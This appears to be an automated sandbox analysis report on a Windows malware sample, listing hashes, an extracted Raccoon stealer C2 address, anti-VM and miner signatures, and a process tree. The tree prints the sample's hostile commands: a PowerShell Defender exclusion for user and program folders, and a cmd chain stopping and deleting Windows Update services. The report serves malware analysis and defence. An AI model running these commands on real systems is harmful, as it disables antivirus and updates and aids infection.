Analysis
-
max time kernel
300s -
max time network
266s -
platform
windows10-1703_x64 -
resource
win10-20220901-en -
resource tags
arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system -
submitted
03-10-2022 03:58
Static task
static1
Behavioral task
behavioral1
Sample
aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe
Resource
win7-20220812-en
General
-
Target
aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe
-
Size
345KB
-
MD5
81f64aa51d334df32af477937bcaa229
-
SHA1
96dee5c07ad3285d45b4120481a8ada23a0619a4
-
SHA256
aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3
-
SHA512
cf2378eb0aba4d9276c3068415d7824af4c1fc97155894007bb01c6abe6f25199f48226ef67cd14bd660d2bb69fd75010c7b631515a385a466f446e8010d5ce5
-
SSDEEP
6144:26S1ZVdum8KDJUOER/YMT8yC4ohO6BV3Cz+WEmCQRjsMYo9TKV9RqvP:EPecUOIYyC4oSz+WEORjsDo9TM9Rqv
Malware Config
Extracted
raccoon
da1ba149e19b3857d89846c73b541f1f
http://135.148.104.11/
Signatures
-
Modifies security service 2 TTPs 5 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo reg.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
setup.exesetup1.exeupdater.exeMoUSO.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ setup1.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ MoUSO.exe -
XMRig Miner payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/5680-1084-0x00007FF679F20000-0x00007FF67A714000-memory.dmp xmrig behavioral2/memory/5680-1087-0x00007FF679F20000-0x00007FF67A714000-memory.dmp xmrig -
Blocklisted process makes network request 1 IoCs
Processes:
WScript.exeflow pid process 18 5016 WScript.exe -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
setup.exeupdater.exedescription ioc process File created C:\Windows\system32\drivers\etc\hosts setup.exe File created C:\Windows\system32\drivers\etc\hosts updater.exe -
Executes dropped EXE 6 IoCs
Processes:
setup.exesetup1.exeupdater.exesetup11.exe11.exeMoUSO.exepid process 4120 setup.exe 4312 setup1.exe 2812 updater.exe 3532 setup11.exe 300 11.exe 5184 MoUSO.exe -
Stops running service(s) 3 TTPs
-
Processes:
resource yara_rule behavioral2/memory/5680-1084-0x00007FF679F20000-0x00007FF67A714000-memory.dmp upx behavioral2/memory/5680-1087-0x00007FF679F20000-0x00007FF67A714000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
setup1.exeupdater.exeMoUSO.exesetup.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion setup1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion MoUSO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion MoUSO.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion setup.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion setup.exe -
Identifies Wine through registry keys 2 TTPs 2 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
Processes:
setup1.exeMoUSO.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Wine setup1.exe Key opened \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000\Software\Wine MoUSO.exe -
Loads dropped DLL 3 IoCs
Processes:
AppLaunch.exepid process 92988 AppLaunch.exe 92988 AppLaunch.exe 92988 AppLaunch.exe -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\setup.exe themida behavioral2/memory/4120-128-0x00007FF7C5DB0000-0x00007FF7C6AB0000-memory.dmp themida behavioral2/memory/4120-129-0x00007FF7C5DB0000-0x00007FF7C6AB0000-memory.dmp themida behavioral2/memory/4120-130-0x00007FF7C5DB0000-0x00007FF7C6AB0000-memory.dmp themida behavioral2/memory/4120-132-0x00007FF7C5DB0000-0x00007FF7C6AB0000-memory.dmp themida behavioral2/memory/4120-133-0x00007FF7C5DB0000-0x00007FF7C6AB0000-memory.dmp themida behavioral2/memory/4120-134-0x00007FF7C5DB0000-0x00007FF7C6AB0000-memory.dmp themida behavioral2/memory/4120-149-0x00007FF7C5DB0000-0x00007FF7C6AB0000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\setup.exe themida behavioral2/memory/4120-327-0x00007FF7C5DB0000-0x00007FF7C6AB0000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida behavioral2/memory/2812-351-0x00007FF71BA80000-0x00007FF71C780000-memory.dmp themida behavioral2/memory/2812-576-0x00007FF71BA80000-0x00007FF71C780000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida behavioral2/memory/2812-1082-0x00007FF71BA80000-0x00007FF71C780000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Processes:
setup.exeupdater.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA setup.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 3 IoCs
Processes:
powershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
setup.exesetup1.exeupdater.exeMoUSO.exepid process 4120 setup.exe 4312 setup1.exe 2812 updater.exe 5184 MoUSO.exe -
Suspicious use of SetThreadContext 4 IoCs
Processes:
aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe11.exeupdater.exedescription pid process target process PID 2692 set thread context of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 300 set thread context of 92988 300 11.exe AppLaunch.exe PID 2812 set thread context of 5520 2812 updater.exe conhost.exe PID 2812 set thread context of 5680 2812 updater.exe conhost.exe -
Drops file in Program Files directory 4 IoCs
Processes:
cmd.execmd.exesetup.exeupdater.exedescription ioc process File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Chrome\updater.exe setup.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 204 sc.exe 3768 sc.exe 4992 sc.exe 4912 sc.exe 4564 sc.exe 2280 sc.exe 324 sc.exe 5048 sc.exe 4308 sc.exe 4788 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.exepowershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe -
Modifies registry class 1 IoCs
Processes:
setup11.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-2368682536-4045190062-1465778271-1000_Classes\Local Settings setup11.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 18 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exesetup1.exepowershell.exepowershell.exepowershell.exepowershell.exeMoUSO.exepid process 2344 powershell.exe 2344 powershell.exe 4312 setup1.exe 4312 setup1.exe 2344 powershell.exe 4728 powershell.exe 4728 powershell.exe 4728 powershell.exe 928 powershell.exe 928 powershell.exe 928 powershell.exe 92544 powershell.exe 92544 powershell.exe 92544 powershell.exe 1556 powershell.exe 1556 powershell.exe 1556 powershell.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe 5184 MoUSO.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 636 -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exedescription pid process Token: SeDebugPrivilege 2344 powershell.exe Token: SeIncreaseQuotaPrivilege 2344 powershell.exe Token: SeSecurityPrivilege 2344 powershell.exe Token: SeTakeOwnershipPrivilege 2344 powershell.exe Token: SeLoadDriverPrivilege 2344 powershell.exe Token: SeSystemProfilePrivilege 2344 powershell.exe Token: SeSystemtimePrivilege 2344 powershell.exe Token: SeProfSingleProcessPrivilege 2344 powershell.exe Token: SeIncBasePriorityPrivilege 2344 powershell.exe Token: SeCreatePagefilePrivilege 2344 powershell.exe Token: SeBackupPrivilege 2344 powershell.exe Token: SeRestorePrivilege 2344 powershell.exe Token: SeShutdownPrivilege 2344 powershell.exe Token: SeDebugPrivilege 2344 powershell.exe Token: SeSystemEnvironmentPrivilege 2344 powershell.exe Token: SeRemoteShutdownPrivilege 2344 powershell.exe Token: SeUndockPrivilege 2344 powershell.exe Token: SeManageVolumePrivilege 2344 powershell.exe Token: 33 2344 powershell.exe Token: 34 2344 powershell.exe Token: 35 2344 powershell.exe Token: 36 2344 powershell.exe Token: SeShutdownPrivilege 4704 powercfg.exe Token: SeCreatePagefilePrivilege 4704 powercfg.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeShutdownPrivilege 4940 powercfg.exe Token: SeCreatePagefilePrivilege 4940 powercfg.exe Token: SeShutdownPrivilege 5108 powercfg.exe Token: SeCreatePagefilePrivilege 5108 powercfg.exe Token: SeShutdownPrivilege 3272 powercfg.exe Token: SeCreatePagefilePrivilege 3272 powercfg.exe Token: SeIncreaseQuotaPrivilege 4728 powershell.exe Token: SeSecurityPrivilege 4728 powershell.exe Token: SeTakeOwnershipPrivilege 4728 powershell.exe Token: SeLoadDriverPrivilege 4728 powershell.exe Token: SeSystemProfilePrivilege 4728 powershell.exe Token: SeSystemtimePrivilege 4728 powershell.exe Token: SeProfSingleProcessPrivilege 4728 powershell.exe Token: SeIncBasePriorityPrivilege 4728 powershell.exe Token: SeCreatePagefilePrivilege 4728 powershell.exe Token: SeBackupPrivilege 4728 powershell.exe Token: SeRestorePrivilege 4728 powershell.exe Token: SeShutdownPrivilege 4728 powershell.exe Token: SeDebugPrivilege 4728 powershell.exe Token: SeSystemEnvironmentPrivilege 4728 powershell.exe Token: SeRemoteShutdownPrivilege 4728 powershell.exe Token: SeUndockPrivilege 4728 powershell.exe Token: SeManageVolumePrivilege 4728 powershell.exe Token: 33 4728 powershell.exe Token: 34 4728 powershell.exe Token: 35 4728 powershell.exe Token: 36 4728 powershell.exe Token: SeIncreaseQuotaPrivilege 4728 powershell.exe Token: SeSecurityPrivilege 4728 powershell.exe Token: SeTakeOwnershipPrivilege 4728 powershell.exe Token: SeLoadDriverPrivilege 4728 powershell.exe Token: SeSystemProfilePrivilege 4728 powershell.exe Token: SeSystemtimePrivilege 4728 powershell.exe Token: SeProfSingleProcessPrivilege 4728 powershell.exe Token: SeIncBasePriorityPrivilege 4728 powershell.exe Token: SeCreatePagefilePrivilege 4728 powershell.exe Token: SeBackupPrivilege 4728 powershell.exe Token: SeRestorePrivilege 4728 powershell.exe Token: SeShutdownPrivilege 4728 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exeRegSvcs.exesetup.execmd.execmd.exesetup1.exepowershell.exesetup11.exedescription pid process target process PID 2692 wrote to memory of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 2692 wrote to memory of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 2692 wrote to memory of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 2692 wrote to memory of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 2692 wrote to memory of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 2692 wrote to memory of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 2692 wrote to memory of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 2692 wrote to memory of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 2692 wrote to memory of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 2692 wrote to memory of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 2692 wrote to memory of 2660 2692 aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe RegSvcs.exe PID 2660 wrote to memory of 4120 2660 RegSvcs.exe setup.exe PID 2660 wrote to memory of 4120 2660 RegSvcs.exe setup.exe PID 2660 wrote to memory of 4312 2660 RegSvcs.exe setup1.exe PID 2660 wrote to memory of 4312 2660 RegSvcs.exe setup1.exe PID 2660 wrote to memory of 4312 2660 RegSvcs.exe setup1.exe PID 4120 wrote to memory of 2344 4120 setup.exe powershell.exe PID 4120 wrote to memory of 2344 4120 setup.exe powershell.exe PID 4120 wrote to memory of 4180 4120 setup.exe cmd.exe PID 4120 wrote to memory of 4180 4120 setup.exe cmd.exe PID 4120 wrote to memory of 5028 4120 setup.exe cmd.exe PID 4120 wrote to memory of 5028 4120 setup.exe cmd.exe PID 4120 wrote to memory of 4728 4120 setup.exe powershell.exe PID 4120 wrote to memory of 4728 4120 setup.exe powershell.exe PID 4180 wrote to memory of 324 4180 cmd.exe sc.exe PID 4180 wrote to memory of 324 4180 cmd.exe sc.exe PID 5028 wrote to memory of 4704 5028 cmd.exe powercfg.exe PID 5028 wrote to memory of 4704 5028 cmd.exe powercfg.exe PID 4180 wrote to memory of 4992 4180 cmd.exe sc.exe PID 4180 wrote to memory of 4992 4180 cmd.exe sc.exe PID 4180 wrote to memory of 4912 4180 cmd.exe sc.exe PID 4180 wrote to memory of 4912 4180 cmd.exe sc.exe PID 5028 wrote to memory of 4940 5028 cmd.exe powercfg.exe PID 5028 wrote to memory of 4940 5028 cmd.exe powercfg.exe PID 4180 wrote to memory of 5048 4180 cmd.exe sc.exe PID 4180 wrote to memory of 5048 4180 cmd.exe sc.exe PID 5028 wrote to memory of 5108 5028 cmd.exe powercfg.exe PID 5028 wrote to memory of 5108 5028 cmd.exe powercfg.exe PID 4180 wrote to memory of 4308 4180 cmd.exe sc.exe PID 4180 wrote to memory of 4308 4180 cmd.exe sc.exe PID 5028 wrote to memory of 3272 5028 cmd.exe powercfg.exe PID 5028 wrote to memory of 3272 5028 cmd.exe powercfg.exe PID 4180 wrote to memory of 3104 4180 cmd.exe reg.exe PID 4180 wrote to memory of 3104 4180 cmd.exe reg.exe PID 4180 wrote to memory of 5052 4180 cmd.exe reg.exe PID 4180 wrote to memory of 5052 4180 cmd.exe reg.exe PID 4180 wrote to memory of 784 4180 cmd.exe reg.exe PID 4180 wrote to memory of 784 4180 cmd.exe reg.exe PID 4180 wrote to memory of 668 4180 cmd.exe reg.exe PID 4180 wrote to memory of 668 4180 cmd.exe reg.exe PID 4180 wrote to memory of 660 4180 cmd.exe reg.exe PID 4180 wrote to memory of 660 4180 cmd.exe reg.exe PID 4312 wrote to memory of 508 4312 setup1.exe schtasks.exe PID 4312 wrote to memory of 508 4312 setup1.exe schtasks.exe PID 4312 wrote to memory of 508 4312 setup1.exe schtasks.exe PID 4120 wrote to memory of 928 4120 setup.exe powershell.exe PID 4120 wrote to memory of 928 4120 setup.exe powershell.exe PID 928 wrote to memory of 4084 928 powershell.exe schtasks.exe PID 928 wrote to memory of 4084 928 powershell.exe schtasks.exe PID 2660 wrote to memory of 3532 2660 RegSvcs.exe setup11.exe PID 2660 wrote to memory of 3532 2660 RegSvcs.exe setup11.exe PID 2660 wrote to memory of 3532 2660 RegSvcs.exe setup11.exe PID 3532 wrote to memory of 5016 3532 setup11.exe WScript.exe PID 3532 wrote to memory of 5016 3532 setup11.exe WScript.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe"C:\Users\Admin\AppData\Local\Temp\aef9a431c2c2d80a9026e9bac2fdddad7a2c9e2dccb7b094034e704890dd1ca3.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\RegSvcs.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"3⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SYSTEM32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits5⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc5⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f5⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f5⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
-
